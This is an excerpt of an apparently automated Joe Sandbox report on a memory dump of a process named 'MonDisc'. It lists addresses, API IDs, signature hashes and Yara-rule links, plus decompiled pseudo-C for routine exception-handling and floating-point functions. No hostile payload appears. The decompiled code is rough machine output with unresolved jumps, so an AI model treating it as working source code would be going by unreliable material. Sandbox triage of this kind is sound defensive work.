                              0x7ff62c8ffa0d
                              0x7ff62c8ffa11
                              0x7ff62c8ffa2a
                              0x7ff62c8ffa32
                              0x7ff62c8ffa36
                              0x7ff62c8ffa46
                              0x7ff62c8ffa49
                              0x7ff62c8ffa54
                              0x7ff62c8ffa58
                              0x7ff62c8ffa66
                              0x7ff62c8ffa68
                              0x7ff62c8ffa6c
                              0x7ff62c8ffa73
                              0x7ff62c8ffa7f
                              0x7ff62c8ffa88
                              0x7ff62c8ffa98
                              0x7ff62c8ffa9e
                              0x7ff62c8ffa9e
                              0x7ff62c8ffaa2
                              0x7ff62c8ffaae
                              0x7ff62c8ffab9
                              0x7ff62c8ffacf
                              0x7ff62c8ffae3
                              0x7ff62c8ffae9
                              0x7ff62c8ffaee
                              0x7ff62c8ffafd
                              0x7ff62c8ffaff
                              0x7ff62c8ffb0a
                              0x7ff62c8ffb16
                              0x7ff62c8ffb1a
                              0x7ff62c8ffb2a
                              0x7ff62c8ffb37
                              0x7ff62c8ffb41
                              0x7ff62c8ffb41
                              0x7ff62c8ffb45
                              0x7ff62c8ffb4a
                              0x7ff62c8ffb52
                              0x7ff62c8ffb68

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 7aa2ef60a39aaf4d0f80491bd7b449f73d601b4bc8389bf0be0b24f0d4b2a546
                              • Instruction ID: fed680bc6d98efa644f72a765e670f73a94de62a152064d131b7f9099c5d4c0e
                              • Opcode Fuzzy Hash: 7aa2ef60a39aaf4d0f80491bd7b449f73d601b4bc8389bf0be0b24f0d4b2a546
                              • Instruction Fuzzy Hash: B841D472B086818ADB21DF26D8043AD77A1FB44BA8F644631DE6D8B396CE3DE445C741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B3D0 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: ff069bac779bcdd314a1f66d279dc8f486c6733c5a44f78111e97c40d74c3f9d
                              • Instruction ID: 6eec3f697eac2d33f89e608175898869f474df42c4f493bd19a3b237c20174c0
                              • Opcode Fuzzy Hash: ff069bac779bcdd314a1f66d279dc8f486c6733c5a44f78111e97c40d74c3f9d
                              • Instruction Fuzzy Hash: 6FE0C226A0AE8182EE68DB1AE8503A97AA5BB9CB98F5C8131CA8D47715DF3DC0558700
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 00007FF62C8F8F3E Relevance: 19.9, APIs: 13, Instructions: 390windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ExtraIconicInfoLengthMessageParentTextWindow
                              • String ID:
                              • API String ID: 2293158828-0
                              • Opcode ID: 58704173757dc4f331a19e9cb3568275fbcde7f231e9f3382646aca2a6a34e48
                              • Instruction ID: c33a6b17873442fdfbbb66c89c3674a15da607b268fc6719d69d1d8e26e391df
                              • Opcode Fuzzy Hash: 58704173757dc4f331a19e9cb3568275fbcde7f231e9f3382646aca2a6a34e48
                              • Instruction Fuzzy Hash: 5CE17A56E289034AFF446F34AC6A2BA29D57F213B4F94863AD419D22D7EE3CF149C103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9C5754 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                              Download Yara Rule
                              C-Code - Quality: 65%
                              			E00007FF67FF62C9C5754(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* _t36;
				void* _t37;
				void* _t38;
				int _t43;
				signed long long _t65;
				long long _t68;
				_Unknown_base(*)()* _t88;
				void* _t92;
				void* _t93;
				void* _t95;
				signed long long _t96;
				struct _EXCEPTION_POINTERS* _t102;

				 *((long long*)(_t95 + 0x10)) = __rbx;
				 *((long long*)(_t95 + 0x18)) = __rsi;
				_t93 = _t95 - 0x4f0;
				_t96 = _t95 - 0x5f0;
				_t65 =  *0x2ca361d8; // 0xd614c512c627
				 *(_t93 + 0x4e0) = _t65 ^ _t96;
				if (__ecx == 0xffffffff) goto 0x2c9c5793;
				_t37 = E00007FF67FF62C974564(_t36);
				r8d = 0x98;
				_t38 = E00007FF67FF62C974DE0(_t37, 0, _t96 + 0x70, __rdx, __r8);
				r8d = 0x4d0;
				E00007FF67FF62C974DE0(_t38, 0, _t93 + 0x10, __rdx, __r8);
				 *((long long*)(_t96 + 0x48)) = _t96 + 0x70;
				_t68 = _t93 + 0x10;
				 *((long long*)(_t96 + 0x50)) = _t68;
				 *0x2c9ee050();
				r8d = 0;
				 *0x2c9ee058();
				if (_t68 == 0) goto 0x2c9c5826;
				 *(_t96 + 0x38) =  *(_t96 + 0x38) & 0x00000000;
				 *((long long*)(_t96 + 0x30)) = _t96 + 0x58;
				 *((long long*)(_t96 + 0x28)) = _t96 + 0x60;
				 *((long long*)(_t96 + 0x20)) = _t93 + 0x10;
				 *0x2c9ee070();
				 *((long long*)(_t93 + 0x108)) =  *((intOrPtr*)(_t93 + 0x508));
				 *((intOrPtr*)(_t96 + 0x70)) = __edx;
				 *((long long*)(_t93 + 0xa8)) = _t93 + 0x510;
				 *((long long*)(_t93 - 0x80)) =  *((intOrPtr*)(_t93 + 0x508));
				 *((intOrPtr*)(_t96 + 0x74)) = r8d;
				_t43 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t88, _t92);
				if (UnhandledExceptionFilter(_t102) != 0) goto 0x2c9c5888;
				if (_t43 != 0) goto 0x2c9c5888;
				if (__ecx == 0xffffffff) goto 0x2c9c5888;
				return E00007FF67FF62C973DE0(E00007FF67FF62C974564(_t45), __ecx,  *(_t93 + 0x4e0) ^ _t96);
			}















                              0x7ff62c9c5754
                              0x7ff62c9c5759
                              0x7ff62c9c5762
                              0x7ff62c9c576a
                              0x7ff62c9c5771
                              0x7ff62c9c577b
                              0x7ff62c9c578c
                              0x7ff62c9c578e
                              0x7ff62c9c579a
                              0x7ff62c9c57a0
                              0x7ff62c9c57ab
                              0x7ff62c9c57b1
                              0x7ff62c9c57bb
                              0x7ff62c9c57c4
                              0x7ff62c9c57c8
                              0x7ff62c9c57cd
                              0x7ff62c9c57e2
                              0x7ff62c9c57e5
                              0x7ff62c9c57ee
                              0x7ff62c9c57f0
                              0x7ff62c9c5803
                              0x7ff62c9c5810
                              0x7ff62c9c5819
                              0x7ff62c9c5820
                              0x7ff62c9c582d
                              0x7ff62c9c583f
                              0x7ff62c9c5843
                              0x7ff62c9c5851
                              0x7ff62c9c5855
                              0x7ff62c9c5859
                              0x7ff62c9c5863
                              0x7ff62c9c5876
                              0x7ff62c9c587a
                              0x7ff62c9c587f
                              0x7ff62c9c58ae

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: ddcf15c5e430d97c0c433eb2608b268b4dbf50b5775fd127252f593d01f75e48
                              • Instruction ID: a85af02937bf0e691d28e44ece3deadd2d20ef7f431e8afe5bb5552d12722cbe
                              • Opcode Fuzzy Hash: ddcf15c5e430d97c0c433eb2608b268b4dbf50b5775fd127252f593d01f75e48
                              • Instruction Fuzzy Hash: 12317636A08B81C6DB60CF25EC402AD73A4FB89764F540536EA8D87B9ADF3CD145CB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9165F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134libraryloadersynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AddressCriticalProcSection$CreateDeleteInitializeLibraryLoadObjectSingleThreadWait
                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                              • API String ID: 3275198946-184456188
                              • Opcode ID: 2e27b2875d66b769ba64ba660a062e27fc3d085249fb0a606fc32e7d451a4fae
                              • Instruction ID: bc2af7870976c3b3e8e218e2c7109714bed4bf49ed85cade7c8f7c33d0b15201
                              • Opcode Fuzzy Hash: 2e27b2875d66b769ba64ba660a062e27fc3d085249fb0a606fc32e7d451a4fae
                              • Instruction Fuzzy Hash: C1612231E1CB8286EF108B19BC615B977A8FB44BA4F580439C99D876AADF7CE055C702
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9169F0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 44libraryloaderthreadCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                              • API String ID: 4260375681-184456188
                              • Opcode ID: b633c80ecc07e22be945b0d230a5f9c6b3a5a3e41201ca62d3f1db35ac4fbc3e
                              • Instruction ID: a52ea1e514fdf5798c5246d31c1803ddc23d7c4b2a8195aab2c7cd51a7936b3d
                              • Opcode Fuzzy Hash: b633c80ecc07e22be945b0d230a5f9c6b3a5a3e41201ca62d3f1db35ac4fbc3e
                              • Instruction Fuzzy Hash: 7D111322E0AB4682EF14CF28A84436933E5FB48B69F544439C94EC6269EF7DE588C301
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B4798 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: "$cosh
                              • API String ID: 1156100317-3800341493
                              • Opcode ID: b43cb023599677540fbdb09b7340c2f8add757efa231faf9ea5364d50d06fef6
                              • Instruction ID: e8188a516cd026b0092ab483db3e5b79355a33a4c1e902b428427e417a704a14
                              • Opcode Fuzzy Hash: b43cb023599677540fbdb09b7340c2f8add757efa231faf9ea5364d50d06fef6
                              • Instruction Fuzzy Hash: 88818E21D28F8588DA63CB34B8513767358AF673E5F519333E58E71A62DF6CA1834701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9D1614 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                              Download Yara Rule
                              C-Code - Quality: 23%
                              			E00007FF67FF62C9D1614(signed int __ecx, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, char _a8, long long _a16, unsigned int _a32, unsigned int _a36, signed short _a38) {
				void* _t31;
				signed short _t32;
				unsigned int _t35;
				unsigned int _t36;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				void* _t53;
				unsigned int _t54;
				signed int _t68;
				signed int _t69;
				void* _t72;
				signed int _t73;
				void* _t74;
				signed int _t78;
				signed int _t81;
				signed long long _t85;
				void* _t102;
				void* _t103;

				_a16 = __rbx;
				r14d = 0;
				asm("movaps [esp+0x20], xmm6");
				_t41 = __ecx & 0x0000001f;
				r15d = __ecx;
				_t2 = _t103 + 0x10; // 0x10
				r13d = _t2;
				if ((__ecx & 0x00000008) == 0) goto 0x2c9d165d;
				if (r12b >= 0) goto 0x2c9d165d;
				E00007FF67FF62C9D0F1C(_t41, __rcx);
				_t42 = _t41 & 0xfffffff7;
				goto 0x2c9d183f;
				_t68 = 0x00000004 & r15b;
				if (_t68 == 0) goto 0x2c9d167b;
				asm("dec ecx");
				if (_t68 >= 0) goto 0x2c9d167b;
				E00007FF67FF62C9D0F1C(_t42, __rcx);
				_t43 = _t42 & 0xfffffffb;
				goto 0x2c9d183f;
				_t69 = sil & r15b;
				if (_t69 == 0) goto 0x2c9d173e;
				asm("dec ecx");
				if (_t69 >= 0) goto 0x2c9d173e;
				_t31 = E00007FF67FF62C9D0F1C(_t43, __rcx);
				_t85 = __r8 & __rcx;
				if (_t69 == 0) goto 0x2c9d1709;
				if (_t85 == 0x2000) goto 0x2c9d16f0;
				if (_t85 == 0x4000) goto 0x2c9d16d7;
				_t72 = _t85 - __rcx;
				if (_t72 != 0) goto 0x2c9d1736;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x43b95]");
				asm("movsd xmm0, [0x4b2d5]");
				if (_t72 > 0) goto 0x2c9d1731;
				goto 0x2c9d172a;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x43b7c]");
				if (_t72 > 0) goto 0x2c9d1718;
				asm("movsd xmm0, [0x4b2ba]");
				goto 0x2c9d172a;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x43b63]");
				if (_t72 <= 0) goto 0x2c9d1722;
				asm("movsd xmm0, [0x4b2a1]");
				goto 0x2c9d1731;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x43b4a]");
				if (_t72 <= 0) goto 0x2c9d1722;
				asm("movsd xmm0, [0x4b278]");
				goto 0x2c9d1731;
				asm("movsd xmm0, [0x4b26e]");
				asm("xorps xmm0, [0x39f9f]");
				asm("movsd [ebp], xmm0");
				_t44 = _t43 & 0xfffffffe;
				goto 0x2c9d183f;
				_t73 = r15b & 0x00000002;
				if (_t73 == 0) goto 0x2c9d183f;
				asm("dec ecx");
				if (_t73 >= 0) goto 0x2c9d183f;
				asm("movsd xmm0, [edx]");
				asm("xorps xmm6, xmm6");
				asm("ucomisd xmm0, xmm6");
				if (_t73 != 0) goto 0x2c9d1771;
				if (_t73 != 0) goto 0x2c9d1771;
				goto 0x2c9d1830;
				_t32 = E00007FF67FF62C9D1D3C(_t31, _t73,  &_a8);
				_t53 = _a8 + 0xfffffa00;
				asm("movsd [esp+0x88], xmm0");
				_t74 = _t53 - 0xfffffbce;
				if (_t74 >= 0) goto 0x2c9d17a1;
				asm("mulsd xmm0, xmm6");
				goto 0x2c9d182b;
				r8d = r14d;
				asm("comisd xmm6, xmm0");
				r8b = _t74 > 0;
				_a38 = _t32 & 0x0000000f | r13w;
				if (_t53 - 0xfffffc03 >= 0) goto 0x2c9d1816;
				_t35 = _a32;
				_t54 = _a36;
				if ((sil & _t35) == 0) goto 0x2c9d17ef;
				_t64 =  ==  ? 1 : 1;
				_t36 = _t35 >> 1;
				_a32 = _t36;
				_t78 = sil & _t54;
				if (_t78 == 0) goto 0x2c9d1808;
				asm("bts eax, 0x1f");
				_a32 = _t36;
				if (_t78 != 0) goto 0x2c9d17e5;
				_a36 = _t54 >> 1;
				asm("movsd xmm0, [esp+0x88]");
				if (r8d == 0) goto 0x2c9d182b;
				asm("xorps xmm0, [0x39ea5]");
				asm("movsd [ebp], xmm0");
				_t80 =  ==  ? 1 : 1;
				if (( ==  ? 1 : 1) == 0) goto 0x2c9d183c;
				E00007FF67FF62C9D0F1C(_t44, _t102);
				_t45 = _t44 & 0xfffffffd;
				_t81 = r13b & r15b;
				if (_t81 == 0) goto 0x2c9d1858;
				asm("dec ecx");
				if (_t81 >= 0) goto 0x2c9d1858;
				E00007FF67FF62C9D0F1C(_t45, _t102);
				asm("movaps xmm6, [esp+0x20]");
				r14b = (_t45 & 0xffffffef) == 0;
				return r14d;
			}
























                              0x7ff62c9d1614
                              0x7ff62c9d1628
                              0x7ff62c9d162b
                              0x7ff62c9d1635
                              0x7ff62c9d163b
                              0x7ff62c9d163e
                              0x7ff62c9d163e
                              0x7ff62c9d1645
                              0x7ff62c9d164a
                              0x7ff62c9d1650
                              0x7ff62c9d1655
                              0x7ff62c9d1658
                              0x7ff62c9d1662
                              0x7ff62c9d1665
                              0x7ff62c9d1667
                              0x7ff62c9d166c
                              0x7ff62c9d166e
                              0x7ff62c9d1673
                              0x7ff62c9d1676
                              0x7ff62c9d1680
                              0x7ff62c9d1683
                              0x7ff62c9d1689
                              0x7ff62c9d168e
                              0x7ff62c9d1697
                              0x7ff62c9d16a4
                              0x7ff62c9d16a7
                              0x7ff62c9d16af
                              0x7ff62c9d16b7
                              0x7ff62c9d16b9
                              0x7ff62c9d16bc
                              0x7ff62c9d16be
                              0x7ff62c9d16c3
                              0x7ff62c9d16cb
                              0x7ff62c9d16d3
                              0x7ff62c9d16d5
                              0x7ff62c9d16d7
                              0x7ff62c9d16dc
                              0x7ff62c9d16e4
                              0x7ff62c9d16e6
                              0x7ff62c9d16ee
                              0x7ff62c9d16f0
                              0x7ff62c9d16f5
                              0x7ff62c9d16fd
                              0x7ff62c9d16ff
                              0x7ff62c9d1707
                              0x7ff62c9d1709
                              0x7ff62c9d170e
                              0x7ff62c9d1716
                              0x7ff62c9d1718
                              0x7ff62c9d1720
                              0x7ff62c9d1722
                              0x7ff62c9d172a
                              0x7ff62c9d1731
                              0x7ff62c9d1736
                              0x7ff62c9d1739
                              0x7ff62c9d173e
                              0x7ff62c9d1742
                              0x7ff62c9d1748
                              0x7ff62c9d174d
                              0x7ff62c9d1753
                              0x7ff62c9d175d
                              0x7ff62c9d1762
                              0x7ff62c9d1766
                              0x7ff62c9d1768
                              0x7ff62c9d176c
                              0x7ff62c9d1776
                              0x7ff62c9d177f
                              0x7ff62c9d1785
                              0x7ff62c9d178e
                              0x7ff62c9d1794
                              0x7ff62c9d1796
                              0x7ff62c9d179c
                              0x7ff62c9d17a9
                              0x7ff62c9d17ac
                              0x7ff62c9d17b0
                              0x7ff62c9d17c0
                              0x7ff62c9d17ce
                              0x7ff62c9d17d0
                              0x7ff62c9d17de
                              0x7ff62c9d17e8
                              0x7ff62c9d17ec
                              0x7ff62c9d17ef
                              0x7ff62c9d17f1
                              0x7ff62c9d17f8
                              0x7ff62c9d17fb
                              0x7ff62c9d17fd
                              0x7ff62c9d1801
                              0x7ff62c9d180d
                              0x7ff62c9d180f
                              0x7ff62c9d1816
                              0x7ff62c9d1822
                              0x7ff62c9d1824
                              0x7ff62c9d182b
                              0x7ff62c9d1830
                              0x7ff62c9d1832
                              0x7ff62c9d1837
                              0x7ff62c9d183c
                              0x7ff62c9d183f
                              0x7ff62c9d1842
                              0x7ff62c9d1844
                              0x7ff62c9d1849
                              0x7ff62c9d1850
                              0x7ff62c9d1858
                              0x7ff62c9d1864
                              0x7ff62c9d187a

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: 14713f9323f902e043806a4d756279997d674d1848590f3c97bb3f2b7c4c9a1b
                              • Instruction ID: cdfaa6d2db8344b7c44afce7c9311d854bdf8702ccbf84b73afb8ae7eee11ae2
                              • Opcode Fuzzy Hash: 14713f9323f902e043806a4d756279997d674d1848590f3c97bb3f2b7c4c9a1b
                              • Instruction Fuzzy Hash: 5751F827D0CD4645FF22AA38EC5037A6261BF49774F548235E95EB65E2DF3CA4828A02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C901000 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
